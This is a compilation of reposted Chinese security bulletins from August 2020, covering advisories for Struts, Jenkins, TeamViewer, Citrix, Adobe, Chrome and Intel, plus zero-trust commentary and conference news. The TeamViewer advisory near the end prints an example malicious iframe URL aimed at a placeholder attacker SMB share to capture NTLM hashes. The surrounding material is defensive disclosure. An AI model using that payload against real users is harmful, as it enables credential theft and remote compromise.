2020年8月13日，阿里云应急响应中心监测到Apache Struts 官方发布安全公告，披露 S2-059 Struts 远程代码执行漏洞。

漏洞描述

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年8月13日披露 S2-059 Struts 远程代码执行漏洞（CVE-2019-0230），在使用某些tag等情况下可能存在OGNL表达式注入漏洞，从而造成远程代码执行，风险极大。阿里云应急响应中心提醒Apache Struts用户尽快采取安全措施阻止漏洞攻击

影响版本

Apache Struts 2.0.0 – 2.5.20

安全版本

Apache Struts >= 2.5.22

安全建议

将Apache Struts框架升级至最新版本。

相关链接

https://cwiki.apache.org/confluence/display/WW/S2-059

 

原文始发于微信公众号（阿里云先知）：【漏洞预警】Apache Struts远程代码执行漏洞（S2-059、CVE-2019-0230）

Jenkins官方发布公告，修复主框架及多款插件存在的安全漏洞。漏洞可能导致跨站脚本（XSS）攻击、跨站点请求伪造（CSRF）攻击，或密码泄露。腾讯安全专家建议用户参考通告内容，将存在风险的插件升级到安全版本。

Jenkins是一款由Java编写的开源的持续集成工具。Jenkins提供了软件开发的持续集成服务。

 

Jenkins公告存在漏洞的组件（主框架、插件）包括：

组件名称	风险等级	存在漏洞的版本	修复版本
Jenkins weekly	高	<2.251	2.252
Jenkins LTS	高	<2.235.3	2.235.4
Email Extension Plugin	低	<2.73	2.74
Flaky Test Handler Plugin	中	<1.0.4	待修复
Pipeline Maven Integration Plugin	高	<3.8.2	3.8.3
Yet Another Build Visualizer Plugin	高	<1.11	1.12

 

以下为漏洞详情

 

1.CVE-2020-2229|Stored XSS vulnerability in help icons

 

漏洞等级：高

 

影响版本：

Jenkins2.251和更早的版本，LTS 2.235.3和更早版本

 

漏洞导致跨站脚本（XSS）攻击。

 

2.CVE-2020-2230|Stored XSS vulnerability in project naming strategy

 

漏洞等级：高

 

影响版本：

Jenkins2.251和更早版本，LTS 2.235.3和更早版本

 

漏洞导致跨站脚本（XSS）攻击。

 

3.CVE-2020-2231|Stored XSS vulnerability in ‘Trigger builds remotely’

 

漏洞等级：高

 

影响版本：

Jenkins 2.251及更早版本，LTS 2.235.3及更早版本

 

漏洞导致跨站脚本（XSS）攻击。

 

4.CVE-2020-2232|SMTP password transmitted and displayed in plain textby Email Extension Plugin

 

漏洞等级：低

 

影响版本：

EmailExtension Plugin

 

电子邮件扩展插件将SMTP密码存储在Jenkins主服务器上的全局配置文件中hudson.plugins.emailext.ExtendedEmailPublisher.xml。

 

当此密码以加密方式存储在磁盘上时，它会通过电子邮件扩展插件2.72和2.73作为配置表单的一部分以纯文本形式传输和显示。这将导致密码泄露。

 

5.CVE-2020-2233|Missing permission check in Pipeline Maven IntegrationPlugin allows enumerating credentials IDs

 

PipelineMaven集成插件缺少权限检查，可以枚举凭据ID

 

漏洞等级：中

 

影响版本：

PipelineMaven集成插件3.8.2和更早版本

 

6.CVE-2020-2234 (permission check), CVE-2020-2235 (CSRF)

CSRF vulnerability and missing permission check in Pipeline MavenIntegration Plugin allow capturing credentials

 

PipelineMaven集成插件中的CSRF漏洞和缺少权限检查允许捕获凭据

 

漏洞等级：高

 

影响版本：

PipelineMaven集成插件3.8.2和更早版本

 

表单验证的方法中不执行权限检查，攻击者可能捕获存储在Jenkins中的凭据。

 

此外，此表单验证方法不需要POST请求，从而导致跨站点请求伪造（CSRF）漏洞。

 

7.CVE-2020-2236|Stored XSS vulnerability in Yet Another BuildVisualizer Plugin

 

BuildVisualizer插件中的XSS漏洞

 

漏洞等级：高

 

影响版本：

BuildVisualizer插件1.11和更早版本

 

8.CVE-2020-2237|CSRF vulnerability in Flaky Test Handler Plugin

 

Flaky测试处理程序插件中的CSRF漏洞

 

漏洞等级：中

 

影响版本：

Flaky TestHandler Plugin 1.0.4和更早版本

 

不需要“ Deflake this build”功能的POST请求，从而导致跨站点请求伪造（CSRF）漏洞。

 

参考链接：

https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1957

原文始发于微信公众号（腾讯安全威胁情报中心）：Jenkins公告多款插件存在高危漏洞（2020.8.12）

近年来，北大毕业卖猪肉，女硕士转行做保姆等新闻层出不穷，引发社会关注。近日，马云更是在央视节目中表示，自己特别欣赏年轻人能放下架子，敢去做快递小哥，这能让中国的快递业变得更有意义。他还认为“敢于放下身段和改变自己，敢于从卖猪肉里学到东西，才是北大精神”。这随即引起网友热议，有人认为行行出状元，说得有理。也有人认为这纯粹是在忽悠年轻人，每一行能赚大钱的毕竟只有站在金字塔顶端的一小批人。对此你怎么看呢？

1

TeamViewer漏洞严重影响Windows

近日，Praetorian的研究人员Jeffrey Hofmann爆出TeamViewer中存在的一个高风险漏洞。

 

该漏洞编号为CVE 2020-13699，风险等级为8.8，影响Windows平台的TeamViewer8至15（最高15.8.2）版本。其可允许黑客远程控制系统，窃取密码，对设备进行破坏。

 

TeamViewer是一种流行的软件应用程序，用于远程控制、桌面共享、在线会议，以及计算机间的文件传输，用户群体达到数百万。

 

黑客会利用该漏洞，在网页里嵌入隐藏的恶意iframe软件。用户访问并点击黑客恶意制作的页面，TeamViewer Windows桌面客户端就会启动，自动强制打开远程SMB共享。

 

通过远程共享连接，就会触发SMB身份验证攻击，让黑客获取目标设备的系统用户名和NTLMv2密码的哈希版本，从而通过设备的身份验证功能，远程控制计算机系统。

 

目前，TeamViewer表示尚未发现漏洞被利用的痕迹。同时，他们已发布15.8.3版本解决该漏洞，并强烈建议用户将软件升级至最新版本，以免受到攻击。

咸鱼想翻身：及时更新升级软件对保护计算机系统还是很重要的。

2

 国内首例5G云游戏侵权案宣判

随着今年ChinaJoy落幕，5G云游戏日益受到业界关注。腾讯、网易、盛趣游戏等游戏大厂商均已推出云游戏平台，加入这场新的争夺战。

 

这项新技术能让海量游戏玩家摆脱终端性能的限制，无需下载客户端，就能得到高品质的游戏体验。但同时，其带来的问题也开始渐渐显露。

 

近期，广州某科技有限公司就在腾讯未授权的情况下，将《英雄联盟》、《穿越火线》等5款游戏置于其云服务器中，让玩家在网页版、移动端和PC端都可使用“菜鸡”云游戏平台获得游戏。

 

此外，他们还将用户流量复制到自家平台上，利用涉案游戏为“菜鸡”云游戏平台做引流宣传，销售云游戏排队加速、加时等有偿服务。

 

昨日，法院对这起国内首例5G云游戏侵害信息网络传播权及不正当竞争纠纷案进行判决。

 

法院表示玩家通过“菜鸡”平台实质上进入的仍是“腾讯”操作系统本身，用户流量未流失。但被告利用技术手段对涉案游戏的服务进行干预和限制，确实损害了腾讯的合法利益。

 

最终，被告公司被判赔偿腾讯方258万元，并删除相关用户数据。

咸鱼想翻身：云游戏在法律上的权利保护和边界界定，的确是个值得深思的问题。

3

华为辟谣半导体 “塔山计划”

此前，华为消费者业务 CEO 余承东在中国信息化百人会 2020 年峰会上表示，华为倡议从根技术做起，打造新生态。在半导体方面，华为将全方位扎根，突破物理学材料学的基础研究和精密制造。

 

显然，在美国的第二轮制裁下，华为在终端器件方面，急需大力加大材料与核心技术的投入，用新材料和新工艺突破瓶颈。

 

近日，就有微博博主爆料称因台积电无法代工华为芯片，华为已在内部正式启动“塔山计划”，并提出明确的战略目标。

 

该博主称华为将自建芯片晶圆厂，准备自行生产制造集成电路芯片产品，建设一条完全没有美国技术的45nm的芯片生产线，预计年内建成，实现芯片供应链自主可控。同时华为还在探索合作建立28nm的自主技术芯片生产线。

 

但目前，该计划已被华为内部人士辟谣。该博主也更新声明承认错误，表示芯片制造是很复杂的工程，具体进展很难完全说清，只有最靠近供应链的才能清楚，真实情况还需多方求证才能知晓。

咸鱼想翻身：虽然“塔山计划”并不存在，但相信华为一定会想办法渡过难关的！

原文始发于微信公众号（看雪学院）：TeamViewer漏洞严重影响Windows；国内首例5G云游戏侵权案宣判；华为辟谣半导体 “塔山计划”

报告编号：B6-2020-081301

报告来源：360CERT

报告作者：360CERT

更新日期：2020-08-13

0x01 事件简述

2020年08月13日， 360CERT监测发现 Citrix官方 发布了 Citrix Endpoint Management组件 的风险通告，包含多个等级不等的漏洞，事件等级：严重，事件评分：9.1分

Citrix Endpoint Management 存在 任意文件读取漏洞，远程未授权攻击者 通过 发送特制HTTP请求，可以造成 读取受影响设备上任意文件 的影响。

对此，360CERT建议广大用户及时将 Citrix Endpoint Management 安装最新补丁。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。

0x02 风险等级

360CERT对该事件的评定结果如下

评定方式	等级
威胁等级	严重
影响面	一般
360CERT评分	9.1分

0x03 漏洞详情

本次安全更新共计 5 处漏洞，编号分别为：

• CVE-2020-8208
• CVE-2020-8209
• CVE-2020-8210
• CVE-2020-8211
• CVE-2020-8212
  

目前仅有 CVE-2020-8209 的信息公开

CVE-2020-8209: Citrix Endpoint Management 任意文件读取漏洞

Citrix Endpoint Management 中存在一处输入验证不足而造成的目录遍历漏洞。

远程未授权攻击者通过发送特制HTTP请求，可以读取受影响服务器上的任意文件。（例如：数据库配置文件，LDAP的账户凭据，邮件数据等）

0x04 影响版本

以下版本受到严重影响

• XenMobile Server < 10.12 RP2
• XenMobile Server < 10.11 RP4
• XenMobile Server < 10.10 RP6
• XenMobile Server < 10.9 RP5

以下版本受到中等影响

• XenMobile Server < 10.12 RP3
• XenMobile Server < 10.11 RP6
• XenMobile Server < 10.10 RP6
• XenMobile Server < 10.9 RP5

0x05 修复建议

通用修补建议：

根据版本安装修补程序

XenMobile Server 10.12 RP3

https://support.citrix.com/article/CTX277473

XenMobile Server 10.11 RP6

https://support.citrix.com/article/CTX277698

XenMobile Server 10.10 RP6

https://support.citrix.com/article/CTX279101

XenMobile Server 10.9 RP5

https://support.citrix.com/article/CTX279098

0x06 相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘，发现Citrix Endpoint Management 具体分布如下图所示。

0x07 产品侧解决方案

360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段，对该类漏洞进行监测，请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。

360安全分析响应平台

360安全大脑的安全分析响应平台通过网络流量检测、多传感器数据融合关联分析手段，对网络攻击进行实时检测和阻断，请用户联系相关产品区域负责人或(shaoyulong#360.cn)获取对应产品。

0x08 时间线

2020-08-11  Citrix 官方发布漏洞通告

2020-08-13  360CERT发布通告

0x09 参考链接

1、 Citrix Endpoint Management (CEM) Security Update

https://support.citrix.com/article/CTX277457

 

原文始发于微信公众号（三六零CERT）：Citrix Endpoint Management 多个高危漏洞通告

数字化转型中，“云大物移”等技术的业务应用加速落地。新技术、新场景的采用，在弹性计算、移动访问等方面提升业务效率。然而，从安全防护角度，新技术模糊了企业网络边界，传统的基于边界防护的安全架构受到了挑战。新技术本身，以及难以避免的Shadow IT问题，带来新的安全风险。在这种新范式下，企业必须不断地分析和评估其内部资产和业务功能的风险，然后制定防护措施来缓解这些风险，这些控制措施既要确保可信访问的通达，同时提供对网络攻击的有效防御，这是零信任出现并且赢得高度关注的背景。

零信任安全是一套关于网络基础设施设计和运行的指导原则，零信任体系架构是一种端到端的网络/数据安全方法，包括身份、凭证、访问管理、操作、端点、宿主环境和互联基础设施。零信任重点在应用和数据的安全，此二者是IT系统支撑业务的价值核心。

零信任理念支柱

零信任的核心理念是：除非得到验证，否则不信任。对于无边界的网络访问而言，后台的应用和资源，需要验证来访的人和设备。这是零信任的基础，即用户可信，设备可信。初次访问，只需要验证二者即可，建立访问会话之后，还需要持续评估访问行为的可信，确认来访问的用户和设备始终保持在安全状态，没有任何异常行为，一旦出现了异常，能够及时的自动化的处理，比如信任等级降低，重新认证，或者直接切断访问会话。零信任安全的支柱，包含以下四个要素：全面感知、最小授信、持续评估、动态决策。

图：零信任理念支柱

 

全面感知

全面感知，指的是要尽可能的收集企业内、外部的信息，对环境作出正确的评价。全面感知的内容，包括且不限于终端环境感知、网络环境感知、网络威胁感知。对于终端初始访问请求，更多的需要感知设备的安全状况，会话建立后，需要感知网络上访问行为的情况。

 

最小授信

用户携带终端设备，访问数据中心的应用和资源，这个过程中，需要对用户和终端授信，并且应该只授予最小的、必要的权限。用户的认证和权限，用户访问应用的映射，甚至应用对用户的授权，都应该是最小的权限。

 

持续评估

用户访问应用的过程中，对访问行为的持续的监控和分析。感知用户活动和相关实体（用户相关的应用和终端等）信息，在此基础上构建用户与群组，并定义这些个体与群组的合法和正常行为，把这些人物角色在群体与群体、群体与个体、个体与个体（那些远离合法和正常行为的群体与个体）维度上相互比对分析，将异常用户（失陷账号）和用户异常（非法行为）检测出来，从而达到检测用户异常、设备异常、访问行为异常等行为。

 

动态决策

动态决策，基于用户、设备和访问行为的风险情况，动态执行响应的防御动作。信任评估引擎完成对用户、设备，以及访问行为的可信评估，再由策略控制引擎完成自动化的访问控制动作。

图：零信任分析和控制

响应动作包括：

●  允许访问

●  需要二次验证

●  需要授权

●  拒绝访问

●  受限访问（允许访问普通应用，不允许访问敏感应用）

绿盟科技零信任安全解决方案

零信任安全体系，构建以用户可信和设备可信为基础，持续评估访问行为可信，自适应访问控制的架构体系。

图：零信任安全架构

零信任策略控制引擎，基于用户身份和权限，设备安全性，来决策是否允许用户的访问请求。在用户访问过程中，持续评估用户和设备的安全风险，必要时策略控制引擎下发指令，中断当前的访问会话。

零信任网络安全解决方案实际部署时，在原有的网络安全基础上，增加零信任安全组件，实现零信任网络访问控制。

零信任架构需要多种安全产品和技术来构建。企业可以借助已经部署的安全产品，将安全防护与零信任相结合，面向未来构建安全架构。评估当前架构和未来愿景的差距，参考业界标准和项目实践，制定路线图和计划，逐步向零信任安全架构迁移。

原文始发于微信公众号（关键基础设施安全应急响应中心）：拥抱零信任理念，重构安全体系架构

 

文章来源：安全学习那些事

2020年8月11日消息 据央视报道，不久前，何先生在某电商平台上购买了一款“清粉”软件，虽然成功“清粉”，但不久后便收到众多骚扰电话，能够说出他具体个人信息。

 

 

报道指出，专家介绍，“清粉”的原理是通过应用集群控制软件控制待清理微信账户，一旦用户同意他人用群控软件“接管”账户，就很可能将自己的个人隐私完全暴露给他人。

 

 

据了解，此前有律师在接受央视采访时表示，“你在扫二维码的同时，也就意味着你把微信的控制权交给了别人，其实他是在代你操作你的微信。”卖家的做法显然违反了微信的用户服务协议。

 

原文始发于微信公众号（黑白之道）：央视提醒：微信清粉服务或泄露个人信息（含视频）

【漏洞补丁】

Adobe发布安全更新，修复多款产品中的26个漏洞

Google为chrome发布安全更新，修复多个漏洞

Intel安全更新修复其服务器主板中的多个提权漏洞

【威胁情报】

新的ReVoLTE攻击可解密4G语音呼叫以窃听对话

【分析报告】

卡巴斯基发布2020年度Q2 DDoS攻击的分析报告

【数据泄露】

安全培训机构SANS遭钓鱼攻击 ，部分员工信息泄露

01

Adobe发布安全更新，修复多款产品中的26个漏洞

Adobe发布安全更新，总计修复了Adobe Acrobat、Reader和Lightroom的中的总共26个漏洞。其中有11个是较为严重的漏洞，可被利用进行远程代码执行或绕过安全功能，分别为Adobe Acrobat和Reader中的越界写导致的任意代码执行漏洞（CVE-2020-9693和CVE-2020-9694）、 安全功能绕过漏洞（CVE-2020-9696和CVE-2020-9712）、缓冲区错误导致的任意代码执行漏洞（CVE-2020-9698、CVE-2020-9699、CVE-2020-9700、CVE-2020-9701和CVE-2020-9704）和 释放后使用导致的任意代码执行漏洞（CVE-2020-9715和CVE-2020-9722）。

   原文链接：

https://www.bleepingcomputer.com/news/security/adobe-fixes-critical-code-execution-bugs-in-acrobat-and-reader/

02

Google为Chrome发布安全更新，修复多个漏洞

Google为Chrome发布了安全更新，修复了多个可被利用以控制受影响系统的漏洞，针对Windows、Mac和Linux版本。其中较为严重的漏洞为释放后使用漏洞（CVE-2020-6542、CVE-2020-6543、CVE-2020-6544和CVE-2020-6545），安装程序执行不当（CVE-2020-6546），媒体中的安全UI错误（CVE-2020-6547），Skia中的堆缓冲区溢出漏洞（ CVE-2020-6548），IndexedDB中的释放后使用漏洞（CVE-2020-6550）和WebXR中的释放后使用漏洞（CVE-2020-6551）等。

  原文链接：

https://us-cert.cisa.gov/ncas/current-activity/2020/08/11/google-releases-security-updates-chrome

03

Intel安全更新修复其服务器主板中的多个提权漏洞

Intel本周二发布通知，声明其已修复了服务器主板中的多个提权漏洞。此次更新总计修复了20多个漏洞，影响了服务器主板、服务器系统和计算模块，其中的大部漏洞可被利用进行提权，还有一部分可被利用通过本地访问发起DoS攻击。其中最严重的漏洞被追踪为CVE-2020-8708，是一个错误的身份验证问题，可被未经身份验证的攻击者利用，通过相邻访问来提权，该漏洞影响了1.59版之前的服务器主板、服务器系统和计算模块。

  原文链接：

https://www.securityweek.com/intel-patches-many-privilege-escalation-vulnerabilities-server-boards

04

新的ReVoLTE攻击可解密4G语音呼叫以窃听对话

德国波鸿的鲁尔大学（Ruhr University）的研究人员发现ReVoLTE攻击可利用LTE语音（VoLTE）协议中的漏洞，破坏4G语音的加密呼叫来窃听对话。研究人员发现，尽管移动运营商确实支持语音呼叫加密，但是许多呼叫都是使用相同的加密密钥。在大多数情况下，基站会重复使用相同的流密码，或者用可预测的算法来生成加密密钥。因此，攻击者可以记录下两个4G用户之间的对话，再与其中一个受害者打电话并记录对话，就可以对通话进行解密。目前，该漏洞已被修复。

  原文链接：

https://www.zdnet.com/article/re-vol-te-attack-can-decrypt-4g-lte-calls-to-eavesdrop-on-conversations/

05

卡巴斯基发布2020年度Q2 DDoS攻击的分析报告

俄罗斯网络安全供应商卡巴斯基发布了2020年度Q2 DDoS攻击的分析报告，发现与2019年第二季度相比，2020年的DDoS攻击数量同比增加了217％。卡巴斯基称，2020年度的趋势与往常背道而驰，通常情况下DDoS攻击在年初开始达到顶峰，然后在春末和夏季下降，而今年的第二季度比第一季度攻击数量增加了30％。在4月9日，单日的攻击次数达到顶峰，为近300次，而第一季度峰值只有242次。卡巴斯基DDoS保护团队认为，这种趋势的改变或许与COVID19的爆发有关。

  原文链接：

https://www.infosecurity-magazine.com/news/ddos-triple-q2/

06

安全培训机构SANS遭钓鱼攻击，部分员工信息泄露

网络安全培训组织SANS遭到网络钓鱼攻击，导致部分员工信息泄露。该公司在8月6日发现其一名员工因加载了恶意Office 365 Oauth应用程序，导致约28000条SANS成员的个人信息（PII）泄露。此次泄露的数据不包括密码或信用卡等财务信息，但包括电子邮件地址、全名、电话号码、工作名称、公司名称和实际地址。SANS表示，其对此事件正在调查中，并已通知可能会受到影响的人。

  原文链接：

https://www.bleepingcomputer.com/news/security/sans-infosec-training-org-suffers-data-breach-after-phishing-attack/

 

原文始发于微信公众号（维他命安全）：Adobe发布安全更新，修复多款产品中的26个漏洞；Intel安全更新修复其服务器主板中的多个提权漏洞

 

　　2020年8月12日，以“并肩应对威胁挑战”为主题的2020中国网络安全年会在网上成功召开。本届中国网络安全年会由国家互联网信息办公室指导，国家计算机网络应急技术处理协调中心（CNCERT/CC）主办，天融信、启明星辰、长安通信、恒安嘉新、安天、阿里云、奇安信、深信服、安恒、亚信安全联合主办，中国通信学会通信安全技术委员会协办。中央网络安全和信息化委员会办公室副总工程师、国家计算机网络应急技术处理协调中心主任李湘宁致欢迎辞。中国工程院院士邬贺铨、邬江兴、张平作主旨报告，工业和信息化部网络安全管理局副局长张新，公安部十一局巡视员、副局长、总工程师郭启全致辞。

　　李湘宁表示，在今年新冠肺炎疫情防控期间，我国信息基础设施的作用显现，网络对于疫情防控与复工复产的支撑作用持续凸显。在线会议、在线办公、远程医疗、网络教育、非接触经济等新业态新模式纷纷各显其能，在新一代信息技术支撑下蓬勃发展，助力抗击疫情和复工复产。但网络安全风险挑战也不断增大，网络空间威胁和风险日益增多。国家计算机网络应急技术处理协调中心作为我国互联网应急处理体系中的牵头单位，以习近平总书记关于网络强国的重要思想为根本遵循，在国家互联网信息办公室的有力领导下，坚持“积极预防、及时发现、快速响应、力保恢复”的方针，全力维护网络空间环境的健康安全，构建起覆盖全国的境内应急协作体系，并致力于构建国际网络安全协作体系，加强网络安全信息共享和技术合作。

　　张新表示，新型基础设施加速发展的同时，也为网络安全工作带来新的挑战，提出新的要求。基础性安全风险加大，融合性安全风险倍增。工业和信息化部强化关键信息基础设施保护、网络安全审查等制度建设，加快构建“新基建”网络安全保障体系，大力发展网络安全产业，扎实推进网络安全工作。下一步，将大力推进网络安全能力建设，着力构建新型网络安全保障体系，筑牢“新基建”稳定运行的安全基石，坚持统筹布局，加强实践指导，增强保障能力，强化产业支撑，培养专业人才。

　　郭启全表示，当前网络空间威胁日益严峻，为有效应对威胁挑战，一是要深入贯彻落实国家网络安全等级保护制度，共同构建网络安全生态，提升全社会网络安全意识和保护能力。二是要共同建立并实施国家关键信息基础设施保护制度，网络安全工作要落实常态化、体系化和实战化，以及主动防御、动态防御、纵深防御、精准防护、整体防控、联防联控的“三化六防”措施。三是要关注理论研究和新技术的发展，最终推动我国网络安全保障能力上升到新高度。

　　随后，我国多名业界知名院士围绕网络安全主题从多角度进行主旨报告。

　　中国工程院院士邬贺铨围绕5G技术与网络安全新挑战的主题，分析了5G技术在安全方面的新进步，但在云化、虚拟化和智能化，开放化、开源化以及大连接方面也存在安全新挑战。邬贺铨表示，网络安全不是单纯的技术问题，而是涉及技术、管理、流程、团队等方面的系统工程，5G时代更需要加强网络安全管理。

　　中国工程院院士邬江兴就网络空间内生安全共性问题及拟态防御分享了观点，阐释了网络空间内生安全问题内涵，分析了大数据、人工智能、区块链、云服务/数据中心、5G网络等存在的内生安全威胁，解释了内生安全体制机制特征、内生安全思想的由来以及内生安全理论与方法，并提出拟态构造及防御的理论技术实践。

　　中国工程院院士张平表示，5G安全问题将影响日常生活、社会功能、经济发展与国家安全。万物互联安全将是未来关注焦点之一，未来针对“新基建”的网络攻击将从数字空间延伸到物理空间。应加强网络空间安全制度保障建设，研判未来颠覆性技术的发展趋势，探寻具备自主性、可控性的网络安全技术，形成多层次、全方位的网络安全和制度保障体系。

　　此外，奇安信集团董事长齐向东，安天科技集团股份有限公司董事长、首席架构师肖新光，杭州安恒信息技术股份有限公司董事长、总裁范渊，天融信科技集团首席执行官李雪莹，亚信安全总裁陆光明，长安通信科技有限责任公司常务副总裁陈训逊，恒安嘉新（北京）科技股份公司首席执行官陈晓光，阿里巴巴副总裁刘松，启明星辰集团合伙人、高级副总裁、网御星云公司总裁胡晓峰，深信服科技股份有限公司副总裁、核心战略负责人马程也围绕网络安全热点问题分享了精彩观点。

　　今年，2020中国网络安全年会首次以网上方式举办，大会还设置了“5G时代的万物互联与安全挑战”“新基建—工业互联网安全”“网络安全态势感知”“5G的数字能力与安全”“新基建新安全”“5G安全论坛”等共6个主题分论坛。经过16年的发展，一年一度的“中国网络安全年会”已成为国内网络安全领域的重要会议，得到政府有关部门、互联网企业、重要信息系统单位和广大互联网用户的广泛关注，是国内网络安全“产、学、研、用”各界进行技术业务交流的重要桥梁和纽带，对于推动我国网络安全工作、提高社会网络安全意识起到了积极作用。

 

转载请注明来源：“网信中国”微信公众号

---

审核：陈舞阳

编辑：赵雅琪

校对：陈金丹　王宇彤

原文始发于微信公众号（E安全）：2020中国网络安全年会在网上成功召开

信安字[2020] 24号

 各工作组、各项目牵头单位：

按照《全国信息安全标准化技术委员会标准制修订工作程序》的有关规定，委员会2020年网络安全标准的立项工作已经完成，现将项目清单印发给你们。请各工作组按照国标委和委员会相关规定，认真做好项目的指导工作，通知并监督好各项目的实施进度。请各项目牵头单位做好项目的研制工作。

附件：2020年网络安全国家标准项目立项清单.pdf

 

全国信息安全标准化技术委员会

  2020年8月11日

详细文档地址：

https://pan.baidu.com/share/init?surl=YumzKLegezXQM3gtaecKgQ  密码zb1b

 

 

原文始发于微信公众号（威努特工控安全）：信安标委发布2020年网络安全标准项目立项清单

报告编号：B6-2020-081002

报告来源：360CERT

报告作者：360CERT

更新日期：2020-08-10

0x01 漏洞简述

2020年08月10日，360CERT监测发现TeamViewer官方发布了TeamViewerURL处理的风险通告，该漏洞编号为CVE-2020-13699，漏洞等级：高危，漏洞评分：8.8分。
TeamViewer存在未引用的搜索路径或元素的安全缺陷，更具体地说，这是由于应用程序没有正确引用它的自定义URI处理程序，当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时，可能会被黑客利用。

对此，360CERT建议广大用户及时将TeamViewer升级到15.8.3版本。与此同时，请做好资产自查以及预防工作，以免遭受黑客攻击。

0x02 风险等级

360CERT对该漏洞的评定结果如下

评定方式	等级
威胁等级	高危
影响面	广泛
360CERT评分	8.8分

0x03 漏洞详情

TeamViewer主要用于远程访问和控制各种类型的计算机系统和移动设备，但也提供协作和演示功能(例如，桌面共享、网络会议、文件传输等)。

TeamViewer存在未引用的搜索路径或元素的安全缺陷，更具体地说，这是由于应用程序没有正确引用它的自定义URI处理程序，当安装了TeamViewer的易受攻击版本的系统访问恶意创建的网站时，可能会被利用，攻击者可以使用精心制作的URL（iframesrc='teamviewer10:--play\attacker-IPsharefake.tvs'）将恶意iframe嵌入网站中，这将启动TeamViewerWindows桌面客户端并强制其执行以下操作：打开远程SMB共享。Windows在打开SMB共享时将执行NTLM身份验证，并且可以将请求进行转发（使用诸如响应程序之类的工具）以执行代码（或捕获以进行哈希破解）。

0x04 影响版本

TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3

0x05 修复建议

通用修补建议：

升级到15.8.3版本，下载地址为：

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

https://www.teamviewer.com/en/download/previous-versions/

0x06 相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘，发现TeamViewer在全球均有广泛使用，具体分布如下图所示。

0x07 产品侧解决方案

360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段，对该类漏洞进行监测，请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。

0x08 时间线

2020-08-06  TeamViewer发布通告

2020-08-10  360CERT发布通告

0x09 参考链接

1、 Statement on CVE 2020-13699

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

2、 TeamViewer flaw could be exploited to crack users’ password

https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/

注：360CERT官方网站提供 《CVE-2020-13699: TeamViewer 用户密码破解漏洞通告》 完整详情，点击阅读原文

原文始发于微信公众号（三六零CERT）：CVE-2020-13699: TeamViewer 用户密码破解漏洞通告